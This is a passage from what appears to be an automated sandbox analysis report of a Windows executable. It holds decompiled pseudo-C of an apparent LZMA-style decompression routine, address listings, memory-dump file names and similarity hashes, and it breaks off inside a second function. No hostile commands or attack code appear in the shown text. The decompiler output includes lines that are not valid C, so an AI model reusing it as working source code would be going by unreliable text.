                                                                                                                                                                                                                            										 *_t397 = _v48 + __ebx;
                                                                                                                                                                                                                            										__eflags =  *_t397;
                                                                                                                                                                                                                            										goto L122;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									__eax = _v84;
                                                                                                                                                                                                                            									_v20 = _v20 >> 0xb;
                                                                                                                                                                                                                            									__edi = _v84 + _v84;
                                                                                                                                                                                                                            									__eax = _v92;
                                                                                                                                                                                                                            									__esi = __edi + __eax;
                                                                                                                                                                                                                            									_v88 = __esi;
                                                                                                                                                                                                                            									__ax =  *__esi;
                                                                                                                                                                                                                            									__ecx = __ax & 0x0000ffff;
                                                                                                                                                                                                                            									__edx = (_v20 >> 0xb) * __ecx;
                                                                                                                                                                                                                            									__eflags = _v16 - __edx;
                                                                                                                                                                                                                            									if(_v16 >= __edx) {
                                                                                                                                                                                                                            										__ecx = 0;
                                                                                                                                                                                                                            										_v20 = _v20 - __edx;
                                                                                                                                                                                                                            										__ecx = 1;
                                                                                                                                                                                                                            										_v16 = _v16 - __edx;
                                                                                                                                                                                                                            										__ebx = 1;
                                                                                                                                                                                                                            										__ecx = _v76;
                                                                                                                                                                                                                            										__ebx = 1 << __cl;
                                                                                                                                                                                                                            										__ecx = 1 << __cl;
                                                                                                                                                                                                                            										__ebx = _v72;
                                                                                                                                                                                                                            										__ebx = _v72 | __ecx;
                                                                                                                                                                                                                            										__cx = __ax;
                                                                                                                                                                                                                            										__cx = __ax >> 5;
                                                                                                                                                                                                                            										__eax = __eax - __ecx;
                                                                                                                                                                                                                            										__edi = __edi + 1;
                                                                                                                                                                                                                            										__eflags = __edi;
                                                                                                                                                                                                                            										_v72 = __ebx;
                                                                                                                                                                                                                            										 *__esi = __ax;
                                                                                                                                                                                                                            										_v84 = __edi;
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										_v20 = __edx;
                                                                                                                                                                                                                            										0x800 = 0x800 - __ecx;
                                                                                                                                                                                                                            										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                                                                                                                            										_v84 = _v84 << 1;
                                                                                                                                                                                                                            										 *__esi = __dx;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									__eflags = _v20 - 0x1000000;
                                                                                                                                                                                                                            									if(_v20 >= 0x1000000) {
                                                                                                                                                                                                                            										L114:
                                                                                                                                                                                                                            										_t374 =  &_v76;
                                                                                                                                                                                                                            										 *_t374 = _v76 + 1;
                                                                                                                                                                                                                            										__eflags =  *_t374;
                                                                                                                                                                                                                            										goto L115;
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										goto L112;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								__ecx = _v16;
                                                                                                                                                                                                                            								__ebx = __ebx + __ebx;
                                                                                                                                                                                                                            								_v20 = _v20 >> 1;
                                                                                                                                                                                                                            								__eflags = _v16 - _v20;
                                                                                                                                                                                                                            								_v72 = __ebx;
                                                                                                                                                                                                                            								if(_v16 >= _v20) {
                                                                                                                                                                                                                            									__ecx = _v20;
                                                                                                                                                                                                                            									_v16 = _v16 - _v20;
                                                                                                                                                                                                                            									__ebx = __ebx | 0x00000001;
                                                                                                                                                                                                                            									__eflags = __ebx;
                                                                                                                                                                                                                            									_v72 = __ebx;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								__eflags = _v20 - 0x1000000;
                                                                                                                                                                                                                            								if(_v20 >= 0x1000000) {
                                                                                                                                                                                                                            									L104:
                                                                                                                                                                                                                            									_t344 =  &_v76;
                                                                                                                                                                                                                            									 *_t344 = _v76 - 1;
                                                                                                                                                                                                                            									__eflags =  *_t344;
                                                                                                                                                                                                                            									goto L105;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									goto L102;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__edx = _v8;
                                                                                                                                                                                                                            							__eax = __eax - __ebx;
                                                                                                                                                                                                                            							_v68 = __ecx;
                                                                                                                                                                                                                            							__eax = _v8 + 0x55e + __eax * 2;
                                                                                                                                                                                                                            							goto L111;
                                                                                                                                                                                                                            						case 0x1a:
                                                                                                                                                                                                                            							L58:
                                                                                                                                                                                                                            							__eflags = _v104;
                                                                                                                                                                                                                            							if(_v104 == 0) {
                                                                                                                                                                                                                            								_v140 = 0x1a;
                                                                                                                                                                                                                            								goto L173;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__ecx = _v108;
                                                                                                                                                                                                                            							__al = _v96;
                                                                                                                                                                                                                            							__edx = _v12;
                                                                                                                                                                                                                            							_v100 = _v100 + 1;
                                                                                                                                                                                                                            							_v108 = _v108 + 1;
                                                                                                                                                                                                                            							_v104 = _v104 - 1;
                                                                                                                                                                                                                            							 *_v108 = __al;
                                                                                                                                                                                                                            							__ecx = _v24;
                                                                                                                                                                                                                            							 *(_v12 + __ecx) = __al;
                                                                                                                                                                                                                            							__eax = __ecx + 1;
                                                                                                                                                                                                                            							__edx = 0;
                                                                                                                                                                                                                            							_t197 = __eax % _v120;
                                                                                                                                                                                                                            							__eax = __eax / _v120;
                                                                                                                                                                                                                            							__edx = _t197;
                                                                                                                                                                                                                            							goto L82;
                                                                                                                                                                                                                            						case 0x1b:
                                                                                                                                                                                                                            							L78:
                                                                                                                                                                                                                            							__eflags = _v104;
                                                                                                                                                                                                                            							if(_v104 == 0) {
                                                                                                                                                                                                                            								_v140 = 0x1b;
                                                                                                                                                                                                                            								goto L173;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eax = _v24;
                                                                                                                                                                                                                            							__eax = _v24 - _v48;
                                                                                                                                                                                                                            							__eflags = __eax - _v120;
                                                                                                                                                                                                                            							if(__eax >= _v120) {
                                                                                                                                                                                                                            								__eax = __eax + _v120;
                                                                                                                                                                                                                            								__eflags = __eax;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__edx = _v12;
                                                                                                                                                                                                                            							__cl =  *(__edx + __eax);
                                                                                                                                                                                                                            							__eax = _v24;
                                                                                                                                                                                                                            							_v96 = __cl;
                                                                                                                                                                                                                            							 *(__edx + __eax) = __cl;
                                                                                                                                                                                                                            							__eax = __eax + 1;
                                                                                                                                                                                                                            							__edx = 0;
                                                                                                                                                                                                                            							_t280 = __eax % _v120;
                                                                                                                                                                                                                            							__eax = __eax / _v120;
                                                                                                                                                                                                                            							__edx = _t280;
                                                                                                                                                                                                                            							__eax = _v108;
                                                                                                                                                                                                                            							_v100 = _v100 + 1;
                                                                                                                                                                                                                            							_v108 = _v108 + 1;
                                                                                                                                                                                                                            							_t289 =  &_v104;
                                                                                                                                                                                                                            							 *_t289 = _v104 - 1;
                                                                                                                                                                                                                            							__eflags =  *_t289;
                                                                                                                                                                                                                            							 *_v108 = __cl;
                                                                                                                                                                                                                            							L82:
                                                                                                                                                                                                                            							_v24 = __edx;
                                                                                                                                                                                                                            							goto L83;
                                                                                                                                                                                                                            						case 0x1c:
                                                                                                                                                                                                                            							while(1) {
                                                                                                                                                                                                                            								L126:
                                                                                                                                                                                                                            								__eflags = _v104;
                                                                                                                                                                                                                            								if(_v104 == 0) {
                                                                                                                                                                                                                            									break;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								__eax = _v24;
                                                                                                                                                                                                                            								__eax = _v24 - _v48;
                                                                                                                                                                                                                            								__eflags = __eax - _v120;
                                                                                                                                                                                                                            								if(__eax >= _v120) {
                                                                                                                                                                                                                            									__eax = __eax + _v120;
                                                                                                                                                                                                                            									__eflags = __eax;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								__edx = _v12;
                                                                                                                                                                                                                            								__cl =  *(__edx + __eax);
                                                                                                                                                                                                                            								__eax = _v24;
                                                                                                                                                                                                                            								_v96 = __cl;
                                                                                                                                                                                                                            								 *(__edx + __eax) = __cl;
                                                                                                                                                                                                                            								__eax = __eax + 1;
                                                                                                                                                                                                                            								__edx = 0;
                                                                                                                                                                                                                            								_t420 = __eax % _v120;
                                                                                                                                                                                                                            								__eax = __eax / _v120;
                                                                                                                                                                                                                            								__edx = _t420;
                                                                                                                                                                                                                            								__eax = _v108;
                                                                                                                                                                                                                            								_v108 = _v108 + 1;
                                                                                                                                                                                                                            								_v104 = _v104 - 1;
                                                                                                                                                                                                                            								_v52 = _v52 - 1;
                                                                                                                                                                                                                            								__eflags = _v52;
                                                                                                                                                                                                                            								 *_v108 = __cl;
                                                                                                                                                                                                                            								_v24 = _t420;
                                                                                                                                                                                                                            								if(_v52 > 0) {
                                                                                                                                                                                                                            									continue;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									L83:
                                                                                                                                                                                                                            									_v140 = 2;
                                                                                                                                                                                                                            									goto L3;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_v140 = 0x1c;
                                                                                                                                                                                                                            							L173:
                                                                                                                                                                                                                            							_push(0x22);
                                                                                                                                                                                                                            							_pop(_t574);
                                                                                                                                                                                                                            							memcpy(_v148,  &_v140, _t574 << 2);
                                                                                                                                                                                                                            							return 0;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				L174:
                                                                                                                                                                                                                            				_t538 = _t537 | 0xffffffff;
                                                                                                                                                                                                                            				return _t538;
                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                            0x00406c31
                                                                                                                                                                                                                            0x00406c3a
                                                                                                                                                                                                                            0x00406c4d
                                                                                                                                                                                                                            0x00406c50
                                                                                                                                                                                                                            0x00406c59
                                                                                                                                                                                                                            0x00406c5c
                                                                                                                                                                                                                            0x00406c84
                                                                                                                                                                                                                            0x00406c84
                                                                                                                                                                                                                            0x00406c86
                                                                                                                                                                                                                            0x00406c94
                                                                                                                                                                                                                            0x00406c94
                                                                                                                                                                                                                            0x00406c98
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c88
                                                                                                                                                                                                                            0x00406c88
                                                                                                                                                                                                                            0x00406c8b
                                                                                                                                                                                                                            0x00406c8b
                                                                                                                                                                                                                            0x00406c8c
                                                                                                                                                                                                                            0x00406c8c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c88
                                                                                                                                                                                                                            0x00406c5e
                                                                                                                                                                                                                            0x00406c62
                                                                                                                                                                                                                            0x00406c67
                                                                                                                                                                                                                            0x00406c67
                                                                                                                                                                                                                            0x00406c70
                                                                                                                                                                                                                            0x00406c76
                                                                                                                                                                                                                            0x00406c78
                                                                                                                                                                                                                            0x00406c7b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c81
                                                                                                                                                                                                                            0x00406c81
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c81
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406c9e
                                                                                                                                                                                                                            0x00406c9e
                                                                                                                                                                                                                            0x00406ca2
                                                                                                                                                                                                                            0x0040754e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040754e
                                                                                                                                                                                                                            0x00406cab
                                                                                                                                                                                                                            0x00406cbb
                                                                                                                                                                                                                            0x00406cbe
                                                                                                                                                                                                                            0x00406cc1
                                                                                                                                                                                                                            0x00406cc1
                                                                                                                                                                                                                            0x00406cc1
                                                                                                                                                                                                                            0x00406cc4
                                                                                                                                                                                                                            0x00406cc4
                                                                                                                                                                                                                            0x00406cc8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406cca
                                                                                                                                                                                                                            0x00406ccd
                                                                                                                                                                                                                            0x00406cd0
                                                                                                                                                                                                                            0x00406cfa
                                                                                                                                                                                                                            0x00406d00
                                                                                                                                                                                                                            0x00406d07
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406d07
                                                                                                                                                                                                                            0x00406cd2
                                                                                                                                                                                                                            0x00406cd6
                                                                                                                                                                                                                            0x00406cd9
                                                                                                                                                                                                                            0x00406cde
                                                                                                                                                                                                                            0x00406cde
                                                                                                                                                                                                                            0x00406ce9
                                                                                                                                                                                                                            0x00406cef
                                                                                                                                                                                                                            0x00406cf1
                                                                                                                                                                                                                            0x00406cf4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406d39
                                                                                                                                                                                                                            0x00406d3f
                                                                                                                                                                                                                            0x00406d42
                                                                                                                                                                                                                            0x00406d4f
                                                                                                                                                                                                                            0x00406d57
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406d0e
                                                                                                                                                                                                                            0x00406d0e
                                                                                                                                                                                                                            0x00406d12
                                                                                                                                                                                                                            0x0040755d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040755d
                                                                                                                                                                                                                            0x00406d1e
                                                                                                                                                                                                                            0x00406d29
                                                                                                                                                                                                                            0x00406d29
                                                                                                                                                                                                                            0x00406d29
                                                                                                                                                                                                                            0x00406d2c
                                                                                                                                                                                                                            0x00406d2f
                                                                                                                                                                                                                            0x00406d32
                                                                                                                                                                                                                            0x00406d35
                                                                                                                                                                                                                            0x00406d37
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004073ce
                                                                                                                                                                                                                            0x004073ce
                                                                                                                                                                                                                            0x004073d4
                                                                                                                                                                                                                            0x004073da
                                                                                                                                                                                                                            0x004073dd
                                                                                                                                                                                                                            0x004073e0
                                                                                                                                                                                                                            0x004073fa
                                                                                                                                                                                                                            0x004073fd
                                                                                                                                                                                                                            0x00407403
                                                                                                                                                                                                                            0x0040740e
                                                                                                                                                                                                                            0x0040740e
                                                                                                                                                                                                                            0x00407410
                                                                                                                                                                                                                            0x004073e2
                                                                                                                                                                                                                            0x004073e2
                                                                                                                                                                                                                            0x004073f1
                                                                                                                                                                                                                            0x004073f5
                                                                                                                                                                                                                            0x004073f5
                                                                                                                                                                                                                            0x00407413
                                                                                                                                                                                                                            0x0040715a
                                                                                                                                                                                                                            0x0040715d
                                                                                                                                                                                                                            0x0040715d
                                                                                                                                                                                                                            0x00407160
                                                                                                                                                                                                                            0x00407163
                                                                                                                                                                                                                            0x00407166
                                                                                                                                                                                                                            0x00407166
                                                                                                                                                                                                                            0x00407169
                                                                                                                                                                                                                            0x00407170
                                                                                                                                                                                                                            0x00407175
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407203
                                                                                                                                                                                                                            0x00407203
                                                                                                                                                                                                                            0x00407207
                                                                                                                                                                                                                            0x004075a5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075a5
                                                                                                                                                                                                                            0x0040720d
                                                                                                                                                                                                                            0x00407210
                                                                                                                                                                                                                            0x00407213
                                                                                                                                                                                                                            0x00407217
                                                                                                                                                                                                                            0x0040721a
                                                                                                                                                                                                                            0x00407220
                                                                                                                                                                                                                            0x00407222
                                                                                                                                                                                                                            0x00407222
                                                                                                                                                                                                                            0x00407222
                                                                                                                                                                                                                            0x00407225
                                                                                                                                                                                                                            0x00407228
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406df8
                                                                                                                                                                                                                            0x00406df8
                                                                                                                                                                                                                            0x00406dfc
                                                                                                                                                                                                                            0x00407569
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407569
                                                                                                                                                                                                                            0x00406e02
                                                                                                                                                                                                                            0x00406e05
                                                                                                                                                                                                                            0x00406e08
                                                                                                                                                                                                                            0x00406e0c
                                                                                                                                                                                                                            0x00406e0f
                                                                                                                                                                                                                            0x00406e15
                                                                                                                                                                                                                            0x00406e17
                                                                                                                                                                                                                            0x00406e17
                                                                                                                                                                                                                            0x00406e17
                                                                                                                                                                                                                            0x00406e1a
                                                                                                                                                                                                                            0x00406e1d
                                                                                                                                                                                                                            0x00406e1d
                                                                                                                                                                                                                            0x00406e20
                                                                                                                                                                                                                            0x00406e23
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406e29
                                                                                                                                                                                                                            0x00406e2f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406e35
                                                                                                                                                                                                                            0x00406e35
                                                                                                                                                                                                                            0x00406e39
                                                                                                                                                                                                                            0x00406e3c
                                                                                                                                                                                                                            0x00406e3f
                                                                                                                                                                                                                            0x00406e42
                                                                                                                                                                                                                            0x00406e45
                                                                                                                                                                                                                            0x00406e46
                                                                                                                                                                                                                            0x00406e49
                                                                                                                                                                                                                            0x00406e4b
                                                                                                                                                                                                                            0x00406e51
                                                                                                                                                                                                                            0x00406e54
                                                                                                                                                                                                                            0x00406e57
                                                                                                                                                                                                                            0x00406e5a
                                                                                                                                                                                                                            0x00406e5d
                                                                                                                                                                                                                            0x00406e60
                                                                                                                                                                                                                            0x00406e63
                                                                                                                                                                                                                            0x00406e7f
                                                                                                                                                                                                                            0x00406e82
                                                                                                                                                                                                                            0x00406e85
                                                                                                                                                                                                                            0x00406e88
                                                                                                                                                                                                                            0x00406e8f
                                                                                                                                                                                                                            0x00406e93
                                                                                                                                                                                                                            0x00406e95
                                                                                                                                                                                                                            0x00406e99
                                                                                                                                                                                                                            0x00406e65
                                                                                                                                                                                                                            0x00406e65
                                                                                                                                                                                                                            0x00406e69
                                                                                                                                                                                                                            0x00406e71
                                                                                                                                                                                                                            0x00406e76
                                                                                                                                                                                                                            0x00406e78
                                                                                                                                                                                                                            0x00406e7a
                                                                                                                                                                                                                            0x00406e7a
                                                                                                                                                                                                                            0x00406e9c
                                                                                                                                                                                                                            0x00406ea3
                                                                                                                                                                                                                            0x00406ea6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406eac
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406eac
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406eb1
                                                                                                                                                                                                                            0x00406eb1
                                                                                                                                                                                                                            0x00406eb5
                                                                                                                                                                                                                            0x00407575
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407575
                                                                                                                                                                                                                            0x00406ebb
                                                                                                                                                                                                                            0x00406ebe
                                                                                                                                                                                                                            0x00406ec1
                                                                                                                                                                                                                            0x00406ec5
                                                                                                                                                                                                                            0x00406ec8
                                                                                                                                                                                                                            0x00406ece
                                                                                                                                                                                                                            0x00406ed0
                                                                                                                                                                                                                            0x00406ed0
                                                                                                                                                                                                                            0x00406ed0
                                                                                                                                                                                                                            0x00406ed3
                                                                                                                                                                                                                            0x00406ed6
                                                                                                                                                                                                                            0x00406ed6
                                                                                                                                                                                                                            0x00406ed6
                                                                                                                                                                                                                            0x00406edc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406ede
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407543
                                                                                                                                                                                                                            0x00407546
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040717d
                                                                                                                                                                                                                            0x0040717f
                                                                                                                                                                                                                            0x00407186
                                                                                                                                                                                                                            0x00407187
                                                                                                                                                                                                                            0x00407189
                                                                                                                                                                                                                            0x0040718c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407194
                                                                                                                                                                                                                            0x00407197
                                                                                                                                                                                                                            0x0040719a
                                                                                                                                                                                                                            0x0040719c
                                                                                                                                                                                                                            0x0040719e
                                                                                                                                                                                                                            0x0040719e
                                                                                                                                                                                                                            0x0040719f
                                                                                                                                                                                                                            0x004071a2
                                                                                                                                                                                                                            0x004071a9
                                                                                                                                                                                                                            0x004071ac
                                                                                                                                                                                                                            0x004071ba
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407490
                                                                                                                                                                                                                            0x00407490
                                                                                                                                                                                                                            0x00407493
                                                                                                                                                                                                                            0x0040749a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040749f
                                                                                                                                                                                                                            0x0040749f
                                                                                                                                                                                                                            0x004074a3
                                                                                                                                                                                                                            0x004075db
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075db
                                                                                                                                                                                                                            0x004074a9
                                                                                                                                                                                                                            0x004074ac
                                                                                                                                                                                                                            0x004074af
                                                                                                                                                                                                                            0x004074b3
                                                                                                                                                                                                                            0x004074b6
                                                                                                                                                                                                                            0x004074bc
                                                                                                                                                                                                                            0x004074be
                                                                                                                                                                                                                            0x004074be
                                                                                                                                                                                                                            0x004074be
                                                                                                                                                                                                                            0x004074c1
                                                                                                                                                                                                                            0x004074c4
                                                                                                                                                                                                                            0x004074c4
                                                                                                                                                                                                                            0x004074c4
                                                                                                                                                                                                                            0x004074c4
                                                                                                                                                                                                                            0x004074c7
                                                                                                                                                                                                                            0x004074c7
                                                                                                                                                                                                                            0x004074cb
                                                                                                                                                                                                                            0x0040752b
                                                                                                                                                                                                                            0x0040752e
                                                                                                                                                                                                                            0x00407533
                                                                                                                                                                                                                            0x00407534
                                                                                                                                                                                                                            0x00407536
                                                                                                                                                                                                                            0x00407538
                                                                                                                                                                                                                            0x0040753b
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x004074cd
                                                                                                                                                                                                                            0x004074d3
                                                                                                                                                                                                                            0x004074d6
                                                                                                                                                                                                                            0x004074d9
                                                                                                                                                                                                                            0x004074dc
                                                                                                                                                                                                                            0x004074df
                                                                                                                                                                                                                            0x004074e2
                                                                                                                                                                                                                            0x004074e5
                                                                                                                                                                                                                            0x004074e8
                                                                                                                                                                                                                            0x004074eb
                                                                                                                                                                                                                            0x004074ee
                                                                                                                                                                                                                            0x00407507
                                                                                                                                                                                                                            0x0040750a
                                                                                                                                                                                                                            0x0040750d
                                                                                                                                                                                                                            0x00407510
                                                                                                                                                                                                                            0x00407514
                                                                                                                                                                                                                            0x00407516
                                                                                                                                                                                                                            0x00407516
                                                                                                                                                                                                                            0x00407517
                                                                                                                                                                                                                            0x0040751a
                                                                                                                                                                                                                            0x004074f0
                                                                                                                                                                                                                            0x004074f0
                                                                                                                                                                                                                            0x004074f8
                                                                                                                                                                                                                            0x004074fd
                                                                                                                                                                                                                            0x004074ff
                                                                                                                                                                                                                            0x00407502
                                                                                                                                                                                                                            0x00407502
                                                                                                                                                                                                                            0x0040751d
                                                                                                                                                                                                                            0x00407524
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407526
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407526
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004071c2
                                                                                                                                                                                                                            0x004071c5
                                                                                                                                                                                                                            0x004071fb
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732e
                                                                                                                                                                                                                            0x0040732e
                                                                                                                                                                                                                            0x00407331
                                                                                                                                                                                                                            0x00407333
                                                                                                                                                                                                                            0x004075bd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075bd
                                                                                                                                                                                                                            0x00407339
                                                                                                                                                                                                                            0x0040733c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407342
                                                                                                                                                                                                                            0x00407346
                                                                                                                                                                                                                            0x004070f6
                                                                                                                                                                                                                            0x004070f7
                                                                                                                                                                                                                            0x004070f9
                                                                                                                                                                                                                            0x004070f9
                                                                                                                                                                                                                            0x004070f9
                                                                                                                                                                                                                            0x004070fc
                                                                                                                                                                                                                            0x004070ff
                                                                                                                                                                                                                            0x00407102
                                                                                                                                                                                                                            0x00407105
                                                                                                                                                                                                                            0x00407105
                                                                                                                                                                                                                            0x00407105
                                                                                                                                                                                                                            0x00407108
                                                                                                                                                                                                                            0x0040710a
                                                                                                                                                                                                                            0x0040710a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040734c
                                                                                                                                                                                                                            0x0040734c
                                                                                                                                                                                                                            0x0040734c
                                                                                                                                                                                                                            0x00407350
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407356
                                                                                                                                                                                                                            0x00407359
                                                                                                                                                                                                                            0x0040735c
                                                                                                                                                                                                                            0x0040735f
                                                                                                                                                                                                                            0x00407361
                                                                                                                                                                                                                            0x00407361
                                                                                                                                                                                                                            0x00407361
                                                                                                                                                                                                                            0x00407364
                                                                                                                                                                                                                            0x00407367
                                                                                                                                                                                                                            0x0040736a
                                                                                                                                                                                                                            0x0040736d
                                                                                                                                                                                                                            0x00407370
                                                                                                                                                                                                                            0x00407373
                                                                                                                                                                                                                            0x00407374
                                                                                                                                                                                                                            0x00407376
                                                                                                                                                                                                                            0x00407376
                                                                                                                                                                                                                            0x00407376
                                                                                                                                                                                                                            0x00407379
                                                                                                                                                                                                                            0x0040737c
                                                                                                                                                                                                                            0x0040737f
                                                                                                                                                                                                                            0x00407382
                                                                                                                                                                                                                            0x00407385
                                                                                                                                                                                                                            0x00407389
                                                                                                                                                                                                                            0x0040738b
                                                                                                                                                                                                                            0x0040738e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407390
                                                                                                                                                                                                                            0x0040710d
                                                                                                                                                                                                                            0x0040710d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040710d
                                                                                                                                                                                                                            0x0040738e
                                                                                                                                                                                                                            0x004075c3
                                                                                                                                                                                                                            0x004075e5
                                                                                                                                                                                                                            0x004075eb
                                                                                                                                                                                                                            0x004075ed
                                                                                                                                                                                                                            0x004075f4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406bf2
                                                                                                                                                                                                                            0x004075fa
                                                                                                                                                                                                                            0x004075fa
                                                                                                                                                                                                                            0x00000000

Memory Dump Source
• Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
• Instruction ID: 41bbaa2e3590000dceee7c9791d291245bc26db239967492cd44d063337b5de0
• Opcode Fuzzy Hash: 42fe04b556333c9da529a864bcd0db0a91825228453d2ef5331aa29539740558
• Instruction Fuzzy Hash: 3E814831D08228DBEF28CFA8C8447ADBBB1FF44305F14816AD856B7281D778A986DF45
Uniqueness
Uniqueness Score: -1.00%

C-Code - Quality: 98%
                                                                                                                                                                                                                            			E00406FFE() {
                                                                                                                                                                                                                            				signed int _t539;
                                                                                                                                                                                                                            				unsigned short _t540;
                                                                                                                                                                                                                            				signed int _t541;
                                                                                                                                                                                                                            				void _t542;
                                                                                                                                                                                                                            				signed int _t543;
                                                                                                                                                                                                                            				signed int _t544;
                                                                                                                                                                                                                            				signed int _t573;
                                                                                                                                                                                                                            				signed int _t576;
                                                                                                                                                                                                                            				signed int _t597;
                                                                                                                                                                                                                            				signed int* _t614;
                                                                                                                                                                                                                            				void* _t621;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				L0:
                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                            					L0:
                                                                                                                                                                                                                            					if( *(_t621 - 0x40) != 1) {
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
